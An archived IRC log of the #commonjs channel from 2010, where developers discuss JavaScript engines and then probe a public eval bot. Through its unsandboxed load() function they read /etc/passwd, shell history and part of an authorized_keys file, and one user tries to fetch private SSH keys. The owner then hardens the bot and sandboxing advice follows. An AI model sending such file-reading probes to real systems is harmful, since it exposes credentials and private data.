Mochabot log - CommonJS IRC channel: #commonjs on irc.freenode.net

2010-02-09:

[2:35] <Dantman> Tch... Stupid wget... Sends a HTTP/1.0 GET but uses a Host: header.
[2:45] <inimino> Dantman: and Connection: keep-alive :-)
[2:55] <Dantman> Stupid Adobe AIR... it's worthless to me without SVG support which is already built into WebKit and would work fine if they just updated...
[3:04] <Dantman> heh... "Out of Firefox, Opera, Safari, Chrome, IE6–8, Appcelerator Titanium and Adobe AIR, only one doesn't support Raphaël. The fact that it isn't IE 6 must be pretty embarrassing for Adobe…"
[3:04] <Dantman> That one really deserves a laugh
[3:05] <Dantman> Adobe may have just lost a potential app to one of its competitors for that reason.
[3:05] <deanlandolt> Dantman: what incentive does Adobe have to push vector graphics forward outside of flash?
[3:06] <deanlandolt> they've been bastards about svg, and have been so ever since the macromedia buy
[3:10] <Dantman> *twitch* Appcelerator Titanium is open-source, and supports native things AIR doesn't? T_T If someone had touted that in comments, I would have taken a look at it earlier...
[3:10] <Dantman> Not to mention iPod, iPad, Android support
[5:00] <Dantman> Heh, Titanium's integration of JavaScript, Ruby, and Python in a way that you can execute functions from other languages is interesting.
[5:01] <Dantman> Looks like they have PHP too
[5:01] <Dantman> Desktop side though
[5:02] <Dantman> I'd love to see someone look at their code for that and publish an extension to PHP to embed js.
[5:45] <Dantman> Damn wait... this could be considered a use case for a commonjs implementation using JSCore
[6:40] <ondras> re
[6:40] <ondras> Wes--: by the way, how do you handle cyclic references with toSource() ?
[7:48] <tlrobinson_> Dantman: Narwhal has a JSCore engine
[7:49] <tlrobinson_> it could probably be bolted onto Titanium
[10:23] <ondras> http://dmitry.baranovskiy.com/post/91403200
[15:30] <Wes--> ondras: toSource() handles cyclic graphs automatically provided the cycles are referenced in plain JS Objects - it uses sharp-object notation
[15:45] <ondras> Wes--: well, the interesting part is when those are not plain js objects
[15:48] <ondras> Wes--: for instance, when the static factory method Obj.createFromData has to accept references as its arguments
[15:59] <Wes--> ondras: It is the responsibility of each object type to be able to represent itself properly with toSource. If you are making a custom object which can have a reference to itself, you will need to support sharp-object notation in your toSource method. IIUC.
[15:59] <Wes--> Personally I try to arrange it so my native objects wind up as leaves on my object graph, so that mozilla handles all the hard cases. :)
[16:00] <ashb> Wes--: isn't sharp obj a mozillaism?
[16:00] <ondras> Wes--: I think that I have a different case on my mind:
[16:00] <Wes--> That said, it might be possible to get toSource for "free" on certain types of objects by exposing a native enumerator; I haven't tried
[16:00] <ondras> Wes--: var obj = {}; var i1 = new MyFunc(obj); var i2 = new MyFunc(obj); [i1,i2].toSource();
[16:00] <Wes--> ashb: Maybe, but if it is, then there are some object graphs which simply cannot be represented with a toSource-like method
[16:01] <ashb> also as an alternative to "#1=#1#" is "(function(){ var a = {}; a.a = a; return a})()"
[16:01] <Wes--> Hmm, that's clever
[16:01] <ondras> Wes--: my question is, how do you create toSource for MyFunc in the scenario above
[16:01] <ashb> toSource itself is a mozilla extension in fact
[16:01] <ashb> it doesn't appear in ECMA262
[16:02] <ondras> ashb: u evul function in json!!!11 :)
[16:02] <ashb> ondras: in json no.
[16:02] <Wes--> js> function MyFunc(o) {this.obj = o }
[16:02] <gbot2> Wes--: undefined
[16:02] <Wes--> js> var obj = {}; var i1 = new MyFunc(obj); var i2 = new MyFunc(obj); [i1,i2].toSource();
[16:02] <gbot2> Wes--: Error: ReferenceError: MyFunc is not defined
[16:02] <Wes--> [{obj:#1={}}, {obj:#1#}]
[16:02] <ashb> but toSource returns JS, not JSON
[16:02] <Wes--> right
[16:02] <Wes--> but it's handy as hell for serializing app state
[16:03] <Wes--> js> for(;;);
[16:03] <ashb> i'm never quite sure what a stream handle should return for toSource tho
[16:03] <gbot2> Wes--: Timeout.
[16:03] <Wes--> damn, somebody fixed that
[16:03] <ashb> :)
[16:03] <ondras> Wes--: well, I expected you to create a custom toSource() ofr MyFunc...
[16:03] <ondras> *for
[16:04] <Wes--> js> require("fs-base").openRaw("/etc/passwd", { mode: write }).close();
[16:04] <gbot2> Wes--: Error: ReferenceError: require is not defined
[16:04] <ondras> :D
[16:04] <Wes--> ondras: That sounds like more thinking than I want to do this morning. :)
[16:04] <ondras> :)
[16:05] <Wes--> js> var a = new Array(10000000000000);
[16:05] <gbot2> Wes--: Error: RangeError: invalid array length
[16:05] <Wes--> js> var a = new Array(100000000000);
[16:05] <gbot2> Wes--: Error: RangeError: invalid array length
[16:05] <Wes--> oh come ON
[16:05] <Wes--> js> var a = []; for (;;) a.push(a);
[16:05] <gbot2> Wes--: Timeout.
[16:05] <ondras> js> var a = []; for (var p in this) a.push(p); a.join(", ");
[16:05] <gbot2> ondras: ""
[16:06] <Wes--> js> this.toSource();
[16:06] <gbot2> Wes--: "({})"
[16:06] <Wes--> js> global.toSource();
[16:06] <gbot2> Wes--: Error: ReferenceError: global is not defined
[16:06] <Wes--> js> eval(this.toSource());
[16:06] * ondras just wanted to try global :)
[16:06] <gbot2> Wes--: {}
[16:06] <MisterN> whose bot is this?
[16:06] <Wes--> I have no clue
[16:06] <ondras> 17:09 [freenode] -!- gbot2 [~bot@boshi.inimino.org]
[16:06] <ondras> 17:09 [freenode] -!- ircname : Joseph Pecoraro (BOT)
[16:06] <MisterN> inimino: your bot?
[16:06] <Wes--> js> help()
[16:06] <gbot2> Wes--: JavaScript-C 1.7.0 2007-10-03Command Usage Description======= ===== ===========version version([number]) Get or set JavaScript version number...
[16:07] <Wes--> Hm, old version of spidermonkey
[16:07] <Wes--> js> File;
[16:07] <gbot2> Wes--: Error: ReferenceError: File is not defined
[16:07] <Wes--> dang, no JS_HAS_FILE_OBJECT
[16:07] <ondras> what a surprise :)
[16:07] <MisterN> js> Array.__proto__
[16:07] <gbot2> MisterN: <function () { }>
[16:07] <Wes--> js> load()
[16:07] <gbot2> Wes--: undefined
[16:07] <MisterN> js> load
[16:07] <gbot2> MisterN: <function load() { [native code] }>
[16:07] <Wes--> ho ho
[16:07] <MisterN> load function exists
[16:07] <Wes--> js> load("/etc/passwd")
[16:07] <gbot2> Wes--: Error: SyntaxError: invalid label: /etc/passwd:1: root:x:0:0:root:/root:/bin/bash /etc/passwd:1: ........^
[16:07] <ondras> :DD
[16:07] <MisterN> wow.
[16:07] <Wes--> js> load("/etc/shadow")
[16:07] <gbot2> Wes--: Error: Error: can't open /etc/shadow: No such file or directory
[16:08] <Wes--> okay, user perms
[16:08] <Wes--> js> load("/etc/hostname")
[16:08] <gbot2> Wes--: Error: Error: can't open /etc/hostname: No such file or directory
[16:08] <ondras> js> load("~/.bash_history")
[16:08] <gbot2> ondras: Error: Error: can't open ~/.bash_history: No such file or directory
[16:08] <MisterN> inimino: you should sandbox it a bit better?
[16:08] <MisterN> js> load("/etc/passwd")
[16:08] <gbot2> MisterN: Error: SyntaxError: invalid label: /etc/passwd:1: root:x:0:0:root:/root:/bin/bash /etc/passwd:1: ........^
[16:08] <Wes--> js> load("/etc/resolv.conf")
[16:08] <gbot2> Wes--: Error: SyntaxError: illegal character: /etc/resolv.conf:1: # Generated by dhcpcd from eth0 /etc/resolv.conf:1: ^
[16:08] <Wes--> js> snarf
[16:08] <gbot2> Wes--: Error: ReferenceError: snarf is not defined
[16:08] <Wes--> damn, that's 1.8.0
[16:09] <ondras> js> load("~/.bashrc")
[16:09] <gbot2> ondras: Error: Error: can't open ~/.bashrc: No such file or directory
[16:09] <Wes--> ondras: ~ will not be expanded
[16:09] <ondras> ah
[16:09] <Wes--> js> load("/home")
[16:09] <gbot2> Wes--: undefined
[16:09] <MisterN> js> load(".bashrc")
[16:09] <gbot2> MisterN: Error: Error: can't open .bashrc: No such file or directory
[16:09] <Wes--> js> load("/user")
[16:09] <gbot2> Wes--: Error: Error: can't open /user: No such file or directory
[16:09] <MisterN> js> load("../.bashrc")
[16:09] <gbot2> MisterN: Error: SyntaxError: illegal character: ../.bashrc:1: # ~/.bashrc: executed by bash(1) for non-login shells. ../.bashrc:1: ^
[16:09] <Wes--> js> load("/home/inimo")
[16:09] <gbot2> Wes--: Error: Error: can't open /home/inimo: No such file or directory
[16:10] <Wes--> js> load("/home/inimimo")
[16:10] <gbot2> Wes--: Error: Error: can't open /home/inimimo: No such file or directory
[16:10] <ondras> js> load("../.bash_history")
[16:10] <gbot2> ondras: Error: SyntaxError: syntax error: ../.bash_history:2: cat >.ssh/authorized_keys ../.bash_history:2: .....^
[16:10] <MisterN> Wes--: just use ..
[16:10] <ondras> :}
[16:10] <inimino> hm...
[16:10] <Wes--> js> load(".profile")
[16:10] <gbot2> Wes--: Error: Error: can't open .profile: No such file or directory
[16:10] <Wes--> js> load("../.profile")
[16:10] <gbot2> Wes--: Error: SyntaxError: illegal character: ../.profile:1: #!/bin/echo 'You must source this file' ../.profile:1: ^
[16:10] <ondras> js> load("../.ssh/authorized_keys")
[16:10] <gbot2> ondras: Error: SyntaxError: missing ; before statement: ../.ssh/authorized_keys:1: ssh-dss AAAAB3NzaC1kc3MAAAIBAKEXjrdwe2tEJw9r04geCwlyYnWx617X2ox/2RVE49dxzjESrWQoawt2pP1jXAhPDFV4VcuJFat4scN+xFiSufOnvjf4SW5gzL/GBKFWy
[16:10] <MisterN> inimino: sorry for hacking your computer :)
[16:10] <Wes--> js> load("../.bash_history")
[16:10] <gbot2> Wes--: Error: SyntaxError: syntax error: ../.bash_history:2: cat >.ssh/authorized_keys ../.bash_history:2: .....^
[16:10] <inimino> Wes--: ok, point made
[16:10] <ondras> js> load("../.ssh/id_rsa")
[16:10] <gbot2> ondras: Error: Error: can't open ../.ssh/id_rsa: No such file or directory
[16:10] <ondras> js> load("../.ssh/id_dsa")
[16:10] <gbot2> ondras: Error: Error: can't open ../.ssh/id_dsa: No such file or directory
[16:10] <ondras> :)
[16:11] <Wes--> hahaha
[16:11] <MisterN> ondras: i almost wanted to try this too but that would have been too mean
[16:11] <inimino> rude
[16:11] <ondras> MisterN: I believe those cannot be actually used until they are o-r
[16:11] <ondras> so the chance for opening them is 0.001...
[16:12] <Wes--> No, it's more like broccoli in your teeth
[16:12] <MisterN> inimino: that kind of behaviour is to be expected in a room with more than 40 adults who really are still little kids :>
[16:12] <Wes--> You would rather your friends point it out than somebody else discover it who will use it for evil
[16:12] <MisterN> Wes--: yeah but id_rsa was unnecessary
[16:13] <Wes--> Although, ondras, actually pulling the ssh key was a bit too far
[16:13] * Wes-- nods
[16:13] <ondras> okay then, sorry :)
[16:13] <MisterN> i was tempted too, though
[16:13] <ondras> great power, I know
[16:13] <MisterN> i love broccoli
[16:14] <evilstreak> my bot went through this abuse when I put him into a channel of geeks
[16:14] <evilstreak> luckily they didn't find anything too destructive, and were only doing it to identify the exploits after which they helped me fix them
[16:16] <MisterN> geordi and the guy who runs codepad use pretty nice techniques to prevent such attacks
[16:17] <Wes--> FWIW if I were running a bot of this nature, I would either use only a clean global object (injecting code from C on load) or stick it in a chroot jail
[16:20] <MisterN> or both.
[16:20] <inimino> it's not even my bot, I just run it as a service to ##javascript
[16:21] <Wes--> *dude*
[16:21] <Wes--> Want a hand securing it?
[16:21] <inimino> should be marginally safer now.
[16:21] <inimino> Wes--: if you feel so moved, sure
[16:21] <inimino> I don't have a lot of time to mess with it
[16:21] <Wes--> inimino: Where is the code?
[16:21] <inimino> `source
[16:21] <gbot2> My source code is available at http://github.com/JosephPecoraro/jsircbot
[16:24] <Wes--> inimino: Wait, the bot is in ruby? I guess it calls the spidermonkey js shell as a sub process?
[16:24] <inimino> Wes--: yes
[16:25] <inimino> http://www.pastie.org/816497
[16:25] <inimino> actually that's the code I'm running now
[16:28] <Wes--> inimino: If you have a source distro of js1.7 on your box, you could rebuild it with slight mods to js.c -- remove anything like JS_DefineFunction(cx, glob....) and empty out the shell_functions[] array
[16:29] <Wes--> inimino: Also JS_DefineObject(cx, globl...)
[16:31] <inimino> Wes--: I just added everything I saw in the shell that looked dangerous on line 230
[16:32] <inimino> I'd like to get v8 and jsc working in the bot, but it's not a high priority
[16:32] <Wes--> inimino: Not idea, although, I have reservations about whitelists
[16:33] <Wes--> inimino: FWIW if you ever get GPSEE up and running locally I can spin up a trivial embedding which would drop right in
[16:33] <inimino> what's an embedding?
[16:59] <Wes--> inimino: application which hosts javascript
[17:03] <inimino> Wes--: ah
[22:19] <zumbrunn> your gbot2 exercises remind me of this: http://zumbrunn.com/mochazone/Shutdown-Day+the+Helma+way/ :-)
